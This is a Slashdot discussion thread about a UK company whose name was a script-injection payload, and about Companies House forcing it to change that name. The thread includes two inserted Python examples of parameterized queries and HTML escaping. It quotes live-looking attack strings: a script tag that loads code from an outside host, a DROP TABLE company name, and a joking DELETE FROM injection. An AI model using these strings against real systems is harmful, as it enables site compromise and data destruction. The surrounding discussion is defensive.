UK Agency Demands Company Stop Using Name Which Includes an HTML Closing Tag (msn.com)

A British software engineer came up with "a fun playful name" for his consulting business. He'd named it:

"">

Unfortunately, this did not amuse the official registrar of companies in the United Kingdom (known as Companies House). The Guardian reports that the U.K. agency "has forced the company to change its name after it belatedly realised it could pose a security risk." Henceforward, the software engineer's consulting business will instead be legally known as "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD." He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.
Engadget adds: Companies House, meanwhile, said it had "put measures in place" to prevent a repeat. You won't be trying this yourself, at least not in the U.K.

It's more than a little amusing to see a for-the-laughs code name stir up trouble, but this also illustrates just how fragile web security can be.

    • Re: (Score:2, Informative)

      by Anonymous Coward
      Hence it being linked from the OP.
    • by thegreatbob ( 693104 ) on Monday November 09, 2020 @03:42AM (#60702192) Journal
      Regarding database access... if your language supports it, use parameterized queries... please.
      • by mccalli ( 323026 ) on Monday November 09, 2020 @04:28AM (#60702286) Homepage
        And if your language doesn't support it, dump it and get a proper language instead.
      • by Sique ( 173459 ) on Monday November 09, 2020 @05:40AM (#60702400) Homepage
        For each of you who just think that "using the proper tool" is already a valid solution, please rethink [kalzumeus.com]!
        • by Entrope ( 68843 )

          Anyone who says "people have names" is a wrong assumption can be safely dismissed as a crank.

          • by Sique ( 173459 )
            People don't necessarily have names, not in the sense we would use it. The "name" of Imperator Augustus was Octavianus, which just meant: The Eighth, as he was the eighth child of his parents. In general, Romans didn't have names, they just acquired titles and nicknames during their life.
            • by Entrope ( 68843 ) on Monday November 09, 2020 @07:19AM (#60702564) Homepage

              He was born Gaius Octavius. (He apparently got his cognomen of "Thurinus" somewhat after his birth.) He changed his name to include Octavianus, after his birth family, after Gaius Julius Caesar died and Caesar's will named Gaius his adopted son and heir. At each point, he had a name that was recognized as such, distinct from titles and nicknames.

              If you're going to try to be pedantic, get at least the core details right.

              • Re: (Score:3, Informative)

                by Sique ( 173459 )
                Actually, Romans had some name, but it didn't really matter. And it gets even more complicated. There were 18 praenomens in use, as far as we know, but most of them went out of use, and only the three Caius, Lucius and Marcus remained, at least for males. As they didn't really help to distinguish people, they went mostly out of daily use, or were left abbreviated in inscriptions. If people were aristocracy, they also had the name of their gens. Thus Caius Iulius (Caesar) was of the gens of the Iulians. But
                • Re: (Score:1, Offtopic)

                  by Entrope ( 68843 )

                  I was rebutting the claim about "people have names" being a false assumption, so it matters very much if Romans had names. I have a name, Donald John Trump has a name, Yoshihide Suga (more formally è... 義å) has a name. "People have names" is an empirically provable fact, not a false assumption.

                  And Octavius was Augustus Caesar's nomen at birth because he was a member of gens Octavia. It had absolutely nothing to do with his birth order.

                  Trying to translate Roman names the way you

                  • by Entrope ( 68843 )

                    Thanks for mangling Prime Minister Suga's name, Slashdot!

                  • by Sique ( 173459 )
                    Emperor Julian Apostata belongs to a different time period. He was not living in Rome (I don't find any source right now that he ever was in Rome even for a visit), but in Constantinople and talking Greek instead of Latin. His name is of Latin origin (as he was the Emperor of the Roman Empire), but that's about as Latin as it gets for him. Differently than for Romans living two or three centuries earlier than him, the actual meaning of the names was not as important as the inheritance of the names from his
                    • by Entrope ( 68843 )

                      You are still not helping your original claim, that Romans didn't have names in the same way we do. They certainly used them differently, but he wasn't named Nero because of his strength or Ahenobarbus because of his beard. You'll find the same kind of name changes in many of the ruling families before the late 20th century -- for example, Prince Philip abandoned his birth titles and changed his family name to Mountbatten. It doesn't mean he was born in, or conquered, Battenberg.

                  • "People have names" is an empirically provable fact, not a false assumption.

                    Everybody that you can name probably does have a "name" in the sense that you use it.

                    But you are not the only person in the world, and the language which you speak is not the only language in the world. Whether you would recognise all the different forms of names in use as being "names" in your familiar sense is a different question.

                    Probably, within a peer group, individuals have some shorthand for identifying one other as distin

                • Anyone who's ever owned an Italian car knows that this practice of repeatedly duct-taping things up rather than coming up with a proper once-and-for-all fix is still alive and active today.
          • Not all cultures assign names before/immediately after birth.

            • by Entrope ( 68843 )

              The crank spent no fewer than five other items in his list on that point. I'm going to charitably assume he was not repeating himself further.

              • Re: (Score:2, Offtopic)

                Personal Name [wikipedia.org]

                Still other cultures lack the concept of specific, fixed names designating people, either individually or collectively. Certain isolated tribes, such as the Machiguenga of the Amazon, do not use personal names.*

                * The Machiguenga may have nicknames, but generally refer to each other by how they are related. They may disambiguate with biographical information, such as "sister, the one who slipped in the river".

            • >> It was because of my father that from the ages of seven to fifteen, I thought that my name was Jesus Christ and my brother, Russell, thought that his name was Dammit. "Dammit, will you stop all that noise?" And, "Jesus Christ, sit down!" One day, I'm out playing in the rain, and my father yelled, "Dammit will you get back in here!" I said, "Dad, I'm Jesus Christ!"

              Too soon? Lol

            • The ones with computer databases do.

          • by St.Creed ( 853824 ) on Monday November 09, 2020 @07:27AM (#60702576)

            I take it you don't model data for international banks.

            Or you work in the USA - the software coming out of the USA is amazingly stupid in its assumptions that every country looks exactly like the USA (just look at the central contact data in SalesForce for an example of US-centric design).

            • by CastrTroy ( 595695 ) on Monday November 09, 2020 @10:34AM (#60703260)

              I don't think it's anything specifically about Americans but really just a problem with naive people making wrong assumptions and then it's difficult to change things later. Let's say you design a system and assume everyone has first_name and last_name, because everybody you have ever met has a first_name and last_name. Then you design a system with this assumption. You get hundreds or thousands (or more) of clients working on your system, happily entering data, and then somebody comes in and asks you to change it so that it's just one big name field. What are your options? Do you force all your existing customers to change the way they do things? Or do you just leave it and tell the new customer to try to work with things the way they are? I think that maybe some other cultures are less susceptible to this because they may be exposed to more languages and customs early on, but I wouldn't say that this is a solely American problem.

          • by Xarun ( 1524715 )

            Anyone who says "people have names" is a wrong assumption can be safely dismissed as a crank.

            A newborn baby needs to be entered into a hospital information system, obviously they are assigned a name at birth, right? There are further examples of why you shouldn't require people to have names, for instance a police information system should take into account the possibility that the person entered into it is unable or unwilling to give a name (note: entering "John Doe" is a *very* poor workaround). I work with Personal Identifiable Information from all over the world and not only do I agree with th

            • by Entrope ( 68843 )

              I am not sure what hospitals near you do, but the ones around here usually put "Baby Boy ", or something similar, for newborns.

              It's one thing to note that there are edge cases, like the kind of people who aren't going to use a computer system, or when they are newborn. But the overwhelming majority of people have names -- most of them include spaces, even -- and prefer to be addressed by name rather than by some arbitrarily assigned number. "I am not a number, I am a person!"

              • by Xarun ( 1524715 )

                I am not sure what hospitals near you do, but the ones around here usually put "Baby Boy ", or something similar, for newborns.

                And yet "Baby Boy something-or-other" is not usually considered a name (neither de facto nor de jure), it is a placeholder. That is one of the things missing from the list, "names are always names".

                the overwhelming majority of people have names -- most of them include spaces, even

                And that is exactly the point of the list, while any of those assumptions are true for some subset of people, you shouldn't assume they hold for all people (not to mention the fact that a space in a name can mean several things, e.g. a name field separator (between, say, first name and last name), a name part sep

                • by anegg ( 1390659 )

                  My personal recommendation is that in information systems you avoid dealing with names where possible, always use IDs except for informational purposes, such as display names.

                  I believe that this is the conclusion that Microsoft came to (eventually), leading to the widespread use of Security Identifiers instead of names. See https://en.wikipedia.org/wiki/Security_Identifier [wikipedia.org]. It makes eminent sense. If nothing else, some people change names when they get married. Others do it for a variety of other reasons. Separating the messiness of human naming from the technical aspects of identity seems to be a good thing to do for a lot of reasons. Different cultural naming convention

                  • If nothing else, some people change names when they get married.

                    Do people change their names if their parents get married where you live? Or, if children are responsible for looking after their parents in their old age, do the parents have to change their names when their children get married?

              • I am not sure what hospitals near you do, but the ones around here usually put "Baby Boy ", or something similar, for newborns.

                So, they have 4 or 5 classifications - anatomical male, anatomical female, anatomically indeterminate (which would normally be about 1% of births), parental non-specified (a significant number of parents want the child themselves to find out what their gender is - say, another percent or so) and "other" (which would probably need to be free-form).

                Your assumptions about what is "rig

            • by anegg ( 1390659 )

              A newborn baby needs to be entered into a hospital information system, obviously they are assigned a name at birth, right?

              When my son was born, my wife and I were having a hard time finalizing his name. The hospital was not very happy that we had not bound a name to our offspring, and were even less happy at the prospect that we would leave their demesne without doing so, and implied that it was illegal for us to do so. After verifying that it was not, in fact, illegal, I contemplated doing it to demonstrate I could. However... we settled on a name before we left, and I chose not to be a d*ck to the hospital.

              While doing ge

          • by Anonymous Coward

            It depends on the application. Are you designing a payroll system, an e-mail system, or another system designed for adults who are part of society? Then yes of course you can assume people have names. Are you designing a system that accounts for people with unknown names (e.g. a hospital admission system or a police report system)? Then you need to account for that.

            Are you accounting for newborns? Then they don't have names either and you need to account for people who are related to known people but don't

      • Also, SQL should allow data to be placed after the query. If you start with a query block, and end with a data block, and require that order, then there is no way the data block contents can change interpretation of the query block. Have a named place-holder option and a sequential match option to match the data to the query.

        Granted, some degree of "data injection" may still be possible if games are played with quotes, but it at least eliminates query injection.
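Added example, not from any commenter: the parameterized-query approach thegreatbob and the "data placed after the query" comment above argue for, shown with Python's built-in sqlite3. The table schema is hypothetical and the sample names are constructed, modelled on the company names quoted elsewhere in this thread.

```python
import sqlite3

# Constructed sample names, modelled on the names quoted in this thread:
# one carrying HTML, one in the "Bobby Tables" style, and one with an
# apostrophe, which is what actually breaks a single-quoted SQL literal.
SAMPLE_NAMES = [
    '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD',
    '; DROP TABLE "COMPANIES";-- LTD',
    "O'Reilly & Sons Ltd",   # constructed
]


def make_registry():
    """In-memory stand-in for a company register (hypothetical schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE companies (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    return con


def register_unsafe(con, name):
    """Anti-pattern: the name is pasted into the SQL text, so a quote in the
    data changes the meaning of the statement (here: a syntax error)."""
    con.execute(f"INSERT INTO companies (name) VALUES ('{name}')")


def register_safe(con, name):
    """Parameterized: the SQL text is fixed and the name travels separately as
    data, so quotes, semicolons and angle brackets are stored verbatim."""
    con.execute("INSERT INTO companies (name) VALUES (?)", (name,))


def lookup(con, name):
    """Exact-name lookup, also parameterized."""
    row = con.execute("SELECT name FROM companies WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def demo():
    """For each sample name: (unsafe insert round-trips?, safe insert round-trips?)."""
    results = {}
    for name in SAMPLE_NAMES:
        con = make_registry()
        try:
            register_unsafe(con, name)
            unsafe_ok = lookup(con, name) == name
        except sqlite3.Error:
            unsafe_ok = False   # the statement broke on a quote inside the data
        con = make_registry()
        register_safe(con, name)
        results[name] = (unsafe_ok, lookup(con, name) == name)
    return results


if __name__ == "__main__":
    for name, (unsafe_ok, safe_ok) in demo().items():
        print(f"{name!r}: concatenated={unsafe_ok} parameterized={safe_ok}")
```

Note that the two names without a single quote happen to survive concatenation too; the parameterized version is the one that holds for every name, which is the point of the comment.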

      • Once saw a talk by someone who actually had some sort of official ID card with something similar to Bobby Tables on it. He said he was security-testing their systems...
    • by tinkerton ( 199273 ) on Monday November 09, 2020 @04:27AM (#60702284)

      Seems like Bobby Tables grew up and went into business!

  • If a simple rejection of particular sequences of characters for a business name reduces security risks for possibly millions of people, then I'm all for that. Or we just could force all those thousands of unemployed software engineers everyone is always talking about into slavery to shore up security in the local library's database and web interface, free of charge.
    • by Anonymous Coward
      Please don't. They're probably unemployed because they caused those same mistakes at their previous employer. It baffles me that so-called Computer Science courses don't have any content on security or even make mention of OWASP and get students to investigate it on their own.
    • by HiThere ( 15173 ) <charleshixsn.earthlink@net> on Monday November 09, 2020 @09:53AM (#60703052)

      That's a pretty big "if". Try this one:
      If a company name written in ASCII-7 will break a database, the database software needs to be rewritten.

      I'm not even asking for Unicode, not even the European plane.

  • by MullerMn ( 526350 ) <andy@@@andrewarbon...co...uk> on Monday November 09, 2020 @03:49AM (#60702208) Homepage
    Please tell me the fact that this tag doesn't render on Slashdot is deliberate and not a sign of how fucking slapdash the editing here is...
    • You mean the tag

      "">

      ? Seems to render fine to me. What's your problem with it?

      • Re:Please tell me.. (Score:5, Informative)

        by Anonymous Coward on Monday November 09, 2020 @04:11AM (#60702264)
        If you RT*second*FA, the company was actually named:
        "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD,

        T*first*FA renders it as "">, so it's unclear whether it's a /. error or just someone copying the problem from the article.
        • by EMN13 ( 11493 ) on Monday November 09, 2020 @05:56AM (#60702422) Homepage

          Although it's some next level irony that one of the articles itself appears to have been vulnerable to script injection somewhere in their publishing pipeline, because it's very implausible they just so happened to purposefully remove the script-tag entirely from the company name without even an explanation.

          • by Megane ( 129182 )

            When a message is posted on Slashdot, all unrecognized tags are stripped. This is why you should always read your preview before clicking the Submit button. If you want to talk about tags, you need to use &lt; and &gt; (and yes, I had to escape those &s as &amp;).

            But since /. "editors" don't, this is what we get.

            • by EMN13 ( 11493 )

              No no, this isn't (just) Slashdot's fault; one of the actual articles omits the script tag too!

        • by sconeu ( 64226 )

          Looks like Little Bobby Tables' mom [xkcd.com] got a new job.

      • Next level:

        ""&gt;
    • Re: (Score:2, Funny)

      by Zocalo ( 252965 )
      Actually, it's the same in TFA, so either ""> actually was the company name or the Guardian rendered it incorrectly (they've used "&gt" in the source though) and Slashdot blindly copied it.

      Anyway, the new company name is now the following smiley :/>, so we're all good, right? :)
  • Output encoding (Score:3, Informative)

    by walter-t ( 253735 ) on Monday November 09, 2020 @04:04AM (#60702240)

    It's not fragile. This was a non-problem over 25 years ago when almost everyone coded CGI scripts in Perl using CGI.pm, and it has not changed with new techniques. People just need an hour of security education before starting to write web applications.

    • by Entrope ( 68843 )

      You might like to think so, but I worked with an application developed by people who knew, and at least mostly cared, about security, but the database stored company names like "Smith &amp; Wesson" for dumb Perl front-end reasons. They didn't want to spend the effort to do it right, so they kept doing it wrong.

    • by Bengie ( 1121981 )
      Even general security experts tend to do the regurgitating rain dance. In one way you'll find that developers following best practice will use a password framework which handles all of the hashing and salting, but then they'll log the raw passwords. If nothing else positive to say about fools, they're creative. Someone will build the Titanic, watch it sink and say "We'll make the next one absolutely impossible to sink" and then they'll build the Hindenburg. There's an unlimited number of ways to fail and fe
  • Adrian Kennard - https://www.revk.uk/ [www.revk.uk] - was that you?

  • by muffen ( 321442 ) on Monday November 09, 2020 @04:35AM (#60702298)
  • by ledow ( 319597 )

    Director: Little Bobby Tables.

  • Good to see those running the country didn't have half a brain to make rules about valid characters for a company name and couldn't manage to have their systems written to be safe to begin with.
    • by nagora ( 177841 )

      Good to see those running the country didn't have half a brain to make rules about valid characters for a company name and couldn't manage to have their systems written to be safe to begin with.

      This is the tip of the iceberg for Companies House. They're probably still using foolscap paper for their filing. Their "database" is full of inaccurate or simply fraudulent information and no one has any time or inclination to do anything about it.

      • Yup. Companies House is one of the more unreliable business directories in the EU. And that's saying something.

        • Re: Pathetic (Score:5, Informative)

          by gnasher719 ( 869701 ) on Monday November 09, 2020 @08:06AM (#60702662)

          Yup. Companies House is one of the more unreliable business directories in the EU. And that's saying something.

          Excuse me, but they are not a business directory. They are the ones who decide if you have a business or not. The ones that send you fines if you don't update your information regularly.

  • They meant "company", not "code".

    Read what you quote FFS, you lazy buggers.

  • by demon driver ( 1046738 ) on Monday November 09, 2020 @05:51AM (#60702414) Journal

    The Register [theregister.com] properly stated the original name on Friday. As Slashdot's forum HTML seems to have no option to make it visible here, either, just like the Guardian, from which they copied it, I can only link to the Register...

    • by Whibla ( 210729 ) on Monday November 09, 2020 @06:50AM (#60702506)

      The Register [theregister.com] properly stated the original name on Friday. As Slashdot's forum HTML seems to have no option to make it visible here, either, just like the Guardian, from which they copied it, I can only link to the Register...

      Your post is, in essence, analogous to the nature of the problem faced by the programmers who 'create' these problems in the first place. Assuming this was your intention, well played sir!

      In order to link to the Register you created an anchor tag (<a>) with the Register's address within it. In other words you've demonstrated the minimal level of understanding required to exploit the main function of the world wide web, the ability to create a 'jump point' to another site. Of course any site that accepts HTML cannot directly display the greater than (>, which you have to write as &gt;) or less than (<, which you have to write as &lt;) symbols because the HTML 'interpreter' thinks you're trying to enter some code as opposed to simple text. Similarly displaying the ampersands in the previous sentence requires the writer to know the code sequence that specifies you want to write it as text rather than have the block it's part of be interpreted as code.

      In other words, there's the level of knowledge essential to make something work, then there's a level of knowledge required to do something more complicated, not to mention the understanding as to why the more complicated stuff is necessary. Hence, on so many occasions, sanitising inputs falls through the cracks.

      So, there is a way of displaying the full company name ("><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD) you just need to jump through a few hoops in order to not trigger the 'what follows is some code' function of the interpreter.

      • Thanks for elaborating! I thought it must be possible somehow and I tried some stuff but indeed I forgot to try HTML entities... Another thing that didn't occur to me at the time was the <xmp> tag, which I guess would have been the most obvious way for a 'real' HTML document; it doesn't seem to work here in the editor, though.

    • by BAReFO0t ( 6240524 ) on Monday November 09, 2020 @06:55AM (#60702524)

      Yes, we do. It's visible in a comment above! All you need to do, is escape the greater than / lower than. >< ... See? I wrote that by writing &gt;&lt; And I wrote THAT, by writing &amp;gt;&amp;lt;.

    • I'm sure there was another of these a few years back - if memory serves, it was a SQL injection attack, rather than XSS, so apparently Companies House have at least plugged one gap.

  • by misnohmer ( 1636461 ) on Monday November 09, 2020 @06:34AM (#60702478)

    Long time ago (early 90's) I attempted to register "com.com" domain name but the registrar (don't remember which one, I was in Canada at the time) refused with a reason given something along the lines of "it is not a valid domain name because it would confuse routing". Later someone did register it and it is a valid domain name today. Had the registrar not refused me back then, I probably could have retired by selling the domain during dot com boom. I was a little bitter about this for a while (late 90's), but oh well....

  • by LilBlackKittie ( 179799 ) on Monday November 09, 2020 @06:37AM (#60702482) Homepage

    Oh wait, there is!

    https://find-and-update.compan... [service.gov.uk]

    aka

    ; DROP TABLE "COMPANIES";-- LTD

  • ""> Something to bypass the minimum size.
  • by gnasher719 ( 869701 ) on Monday November 09, 2020 @08:03AM (#60702658)
    Companies House is the government agency that has the power to allow you to have a company name or refuse you the right. They absolutely have the right to refuse a name that could cause problems.

    The stupid assumption that Companies House themselves have a vulnerability is a non sequitur. But they are responsible for business names not creating _any_ kind of trouble, usually by using misleading business names, and can reject this name.
  • by DarkOx ( 621550 ) on Monday November 09, 2020 @08:11AM (#60702674) Journal

    You guys realize it's possible the Company office has no problems handling the characters but still does not want them used because they share data with others. Others who might make dumb decisions like "I can trust the data because it's coming from a state agency."

    This is the reality of interoperating with others' systems, for those of you who have not figured it out yet. Even if your system does everything right, you still get a black eye and get blamed as often as not. Maybe your web service returns a nice JSON blob with everything correctly escaped for JSON, maybe you explicitly stated in the documentation that content is not neutralized for HTML. Guess what: when some bank blindly sets the CompanyName string you send to the .innerHTML property of some DOM object, they will still call you and complain if something bad happens.
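Added example, not from any commenter or from Companies House: the output-encoding point made by walter-t, Megane, Whibla and DarkOx above, in Python. It shows that a registry's JSON is valid JSON yet not HTML-neutral, that escaping for the HTML context at render time neutralises the name quoted in this thread, and why storing pre-encoded names (Entrope's "Smith &amp; Wesson") double-escapes on display. The record is constructed.

```python
import html
import json

# Constructed record using the company name quoted in the thread above.
COMPANY = {"name": '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD'}


def registry_json(record):
    """What a registry web service might return: valid JSON. json.dumps
    escapes quotes and backslashes for JSON but leaves '<' and '>' alone,
    so the blob is correct for JSON and still not safe to drop into HTML."""
    return json.dumps(record)


def render_unsafe(name):
    """Anti-pattern: the raw name is pasted into markup. The leading '">'
    closes the attribute and the <SCRIPT ...> tag becomes live markup,
    the same effect as assigning the string to innerHTML."""
    return f'<td title="{name}">{name}</td>'


def render_safe(name):
    """Escape for the HTML context at output time (&lt; &gt; &quot; &amp;),
    so the browser shows the tag as text instead of parsing it."""
    safe = html.escape(name, quote=True)
    return f'<td title="{safe}">{safe}</td>'


def has_live_script_tag(markup):
    """Crude detector used by the checks below: a literal '<script' in the
    markup means the name was not neutralised for HTML."""
    return "<script" in markup.lower()


def render_pre_encoded(stored):
    """Why encoding belongs at output, not in the database: a name stored
    as 'Smith &amp; Wesson' is encoded again on display and shows up as
    'Smith &amp;amp; Wesson'."""
    return html.escape(stored, quote=True)


def checks():
    """The observations a defender would want, as booleans."""
    name = COMPANY["name"]
    return {
        "json_contains_tag": "<SCRIPT" in registry_json(COMPANY),
        "unsafe_render_live": has_live_script_tag(render_unsafe(name)),
        "safe_render_live": has_live_script_tag(render_safe(name)),
        # Escaping is lossless: the stored name stays exact and recoverable.
        "round_trip": html.unescape(html.escape(name, quote=True)) == name,
    }


if __name__ == "__main__":
    print(registry_json(COMPANY))
    print(render_safe(COMPANY["name"]))
    for key, value in checks().items():
        print(f"{key}: {value}")
```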

  • by thegarbz ( 1787294 ) on Monday November 09, 2020 @12:00PM (#60703626)

    It started out as a joke. Me and some comrades were drinking wodka and thought, why don't we steal an election. So I filled out a few absentee ballot request forms. When we registered we signed our names as "Garbz'); DELETE FROM Voters WHERE Registered LIKE '%Republican%'"

    It was just fun and games. And then I saw the absentee ballots get counted.

    I'm sorry comrades.
